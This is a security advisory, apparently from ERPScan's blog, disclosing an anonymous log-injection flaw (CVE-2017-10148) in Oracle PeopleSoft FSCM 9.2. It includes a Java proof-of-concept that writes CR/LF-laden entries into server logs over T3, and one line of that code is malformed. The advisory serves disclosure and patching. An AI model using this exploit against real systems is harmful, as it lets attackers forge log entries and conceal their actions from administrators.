[ERPSCAN-17-042] Anonymous log injection in FSCM

Application: Oracle PeopleSoft
Versions Affected: PeopleSoft FSCM 9.2
Vendor: Oracle
Bug: Anonymous log injection
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: Log injection
Risk: High
Impact: Fraud log events, hiding actions on the system
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10148

CVSS Information

CVSS Base Score v3: 5.8 / 10
CVSS Base Vector:

VULNERABILITY DESCRIPTION

An attacker can use a special T3 request to inject special data to log files.

VULNERABLE PACKAGES

PeopleSoft FSCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU July 2017.

TECHNICAL DESCRIPTION

Proof of Concept

static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {
        Properties p = new Properties();
        p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
        p.put(Context.PROVIDER_URL, "t3://"PS_SERVER_IP+":"+PS_SERVER_PORT);
        Context ctx = new InitialContext(p);
        Object obj = ctx.lookup("weblogic.common.T3Services");
        Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
        T3ServicesDef h = (T3ServicesDef) o;

                h.log().log("ERPScan_1\n\rERPScan_2");
		h.log().info("ERPScan_3\n\rERPScan_4");
		h.log().error("ERPScan_5\n\rERPScan_6");
		h.log().warning("ERPScan_7\n\rERPScan_8");
		h.log().debug("ERPScan_9\n\rERPScan_10");
        return false;
    }

The post [ERPSCAN-17-042] Anonymous log injection in FSCM appeared first on ERPScan.